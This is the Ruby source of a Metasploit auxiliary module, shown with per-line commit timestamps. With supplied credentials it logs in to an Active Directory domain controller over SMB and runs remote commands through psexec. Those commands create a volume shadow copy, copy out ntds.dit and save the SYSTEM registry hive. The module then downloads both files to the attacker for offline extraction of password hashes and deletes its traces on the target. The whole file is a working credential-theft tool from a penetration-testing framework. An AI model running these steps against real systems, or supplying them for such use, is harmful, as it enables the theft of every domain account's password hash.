metasploit-framework/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb

258 lines
8.9 KiB
Ruby
Raw Normal View History

2013-03-11 01:07:04 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-03-11 01:07:04 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2012-12-14 14:53:22 +00:00
2013-08-30 21:28:54 +00:00
# Exploit mixins should be called first
2015-02-13 23:17:59 +00:00
include Msf::Exploit::Remote::SMB::Client::Psexec
2013-08-30 21:28:54 +00:00
include Msf::Auxiliary::Report
2013-08-30 21:28:54 +00:00
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT= Rex::Proto::SMB::Exceptions
CONST= Rex::Proto::SMB::Constants
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'PsExec NTDS.dit And SYSTEM Hive Download Utility',
'Description'=> %q{
This module authenticates to an Active Directory Domain Controller and creates
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the
ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM
hive copy can be used in combination with other tools for offline extraction of AD
password hashes. All of this is done without uploading a single binary to the
target host.
},
'Author' => [
'Royce Davis <rdavis[at]accuvant.com>' # @R3dy__
],
'License'=> MSF_LICENSE,
'References' => [
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ]
]
))
2013-08-30 21:28:54 +00:00
register_options([
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]),
])
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
# This is the main control method
def run
# Initialize some variables
text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
createvsc = "vssadmin create shadow /For=%SYSTEMDRIVE%"
@ip = datastore['RHOST']
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
# Try and authenticate with given credentials
2013-08-30 21:28:54 +00:00
begin
smb_login
rescue StandardError => autherror
2016-02-01 22:06:34 +00:00
print_error("Unable to authenticate with given credentials: #{autherror}")
2013-08-30 21:28:54 +00:00
return
end
# If a VSC was specified then don't try and create one
if datastore['VSCPATH'].length > 0
2016-02-01 22:06:34 +00:00
print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
2013-08-30 21:28:54 +00:00
vscpath = datastore['VSCPATH']
else
unless datastore['CREATE_NEW_VSC']
2013-08-30 21:28:54 +00:00
vscpath = check_vss(text, bat)
end
unless vscpath
vscpath = make_volume_shadow_copy(createvsc, text, bat)
end
end
if vscpath
if copy_ntds(vscpath, text) and copy_sys_hive
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
else
2016-02-01 22:06:34 +00:00
print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.")
2013-08-30 21:28:54 +00:00
end
end
cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
disconnect
end
end
2013-08-30 21:28:54 +00:00
# Thids method will check if a Volume Shadow Copy already exists and use that rather
# then creating a new one
def check_vss(text, bat)
begin
2016-02-01 22:06:34 +00:00
print_status("Checking if a Volume Shadow Copy exists already.")
2013-08-30 21:28:54 +00:00
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
result = psexec(command)
data = smb_read_file(datastore['SMBSHARE'], @ip, text)
vscs = []
data.each_line { |line| vscs << line if line.include?("GLOBALROOT") }
if vscs.empty?
2016-02-01 22:06:34 +00:00
print_status("No VSC Found.")
2013-08-30 21:28:54 +00:00
return nil
end
vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp
2016-02-01 22:06:34 +00:00
print_good("Volume Shadow Copy exists on #{vscpath}")
2013-08-30 21:28:54 +00:00
return vscpath
rescue StandardError => vsscheckerror
2016-02-01 22:06:34 +00:00
print_error("Unable to determine if VSS is enabled: #{vsscheckerror}")
2013-08-30 21:28:54 +00:00
return nil
end
end
2013-08-30 21:28:54 +00:00
# Create a Volume Shadow Copy on the target host
def make_volume_shadow_copy(createvsc, text, bat)
begin
#Try to create the shadow copy
command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
2016-02-01 22:06:34 +00:00
print_status("Creating Volume Shadow Copy")
2013-08-30 21:28:54 +00:00
out = psexec(command)
#Get path to Volume Shadow Copy
vscpath = get_vscpath(text)
rescue StandardError => vscerror
2016-02-01 22:06:34 +00:00
print_error("Unable to create the Volume Shadow Copy: #{vscerror}")
2013-08-30 21:28:54 +00:00
return nil
end
if vscpath
2016-02-01 22:06:34 +00:00
print_good("Volume Shadow Copy created on #{vscpath}")
2013-08-30 21:28:54 +00:00
return vscpath
else
return nil
end
end
2013-08-30 21:28:54 +00:00
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
def copy_ntds(vscpath, text)
begin
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
run = psexec(command)
if !check_ntds(text)
return false
end
return true
rescue StandardError => ntdscopyerror
2016-02-01 22:06:34 +00:00
print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}")
2013-08-30 21:28:54 +00:00
return false
end
end
2013-08-30 21:28:54 +00:00
# Checks if ntds.dit was copied to the Windows Temp directory
def check_ntds(text)
2016-02-01 22:06:34 +00:00
print_status("Checking if NTDS.dit was copied.")
2013-08-30 21:28:54 +00:00
check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}"
run = psexec(check)
output = smb_read_file(@smbshare, @ip, text)
if output.include?("ntds")
return true
end
return false
end
2013-01-22 15:36:43 +00:00
2013-08-30 21:28:54 +00:00
# Copies the SYSTEM hive file to the Temp directory on the target host
def copy_sys_hive
begin
# Try to crate the sys hive copy
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
return psexec(command)
rescue StandardError => hiveerror
2016-02-01 22:06:34 +00:00
print_error("Unable to copy the SYSTEM hive file: #{hiveerror}")
2013-08-30 21:28:54 +00:00
return false
end
end
2013-08-30 21:28:54 +00:00
# Download the ntds.dit copy to your attacking machine
def download_ntds(file)
2016-02-01 22:06:34 +00:00
print_status("Downloading ntds.dit file")
2013-08-30 21:28:54 +00:00
begin
# Try to download ntds.dit
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
2016-02-01 22:06:34 +00:00
print_good("ntds.dit stored at #{ntds_path}")
2013-08-30 21:28:54 +00:00
rescue StandardError => ntdsdownloaderror
2016-02-01 22:06:34 +00:00
print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
2013-08-30 21:28:54 +00:00
return ntdsdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
2013-08-30 21:28:54 +00:00
# Download the SYSTEM hive copy to your attacking machine
def download_sys_hive(file)
2016-02-01 22:06:34 +00:00
print_status("Downloading SYSTEM hive file")
2013-08-30 21:28:54 +00:00
begin
# Try to download SYSTEM hive
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive")
2016-02-01 22:06:34 +00:00
print_good("SYSTEM hive stored at #{hive_path}")
2013-08-30 21:28:54 +00:00
rescue StandardError => sysdownloaderror
2016-02-01 22:06:34 +00:00
print_error("Unable to download SYSTEM hive: #{sysdownloaderror}")
2013-08-30 21:28:54 +00:00
return sysdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
2013-08-30 21:28:54 +00:00
# Gets the path to the Volume Shadow Copy
def get_vscpath(file)
begin
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
vsc = ""
output = smb_read_file(@smbshare, @ip, file)
output.each_line do |line|
vsc += line if line.include?("GLOBALROOT")
end
return prepath + vsc.split("ShadowCopy")[1].chomp
rescue StandardError => vscpath_error
2016-02-01 22:06:34 +00:00
print_error("Could not determine the exact path to the VSC check your WINPATH")
2013-08-30 21:28:54 +00:00
return nil
end
end
2012-12-14 14:53:22 +00:00
2013-08-30 21:28:54 +00:00
# Removes files created during execution.
def cleanup_after(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
2016-02-01 22:06:34 +00:00
print_status("Executing cleanup...")
2013-08-30 21:28:54 +00:00
files.each do |file|
begin
if smb_file_exist?(file)
smb_file_rm(file)
end
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
2016-02-01 22:06:34 +00:00
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
2013-08-30 21:28:54 +00:00
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
2016-02-01 22:06:34 +00:00
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
2013-08-30 21:28:54 +00:00
else
2016-02-01 22:06:34 +00:00
print_status("Cleanup was successful")
2013-08-30 21:28:54 +00:00
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
2013-01-22 15:36:43 +00:00
2012-12-14 14:53:22 +00:00
end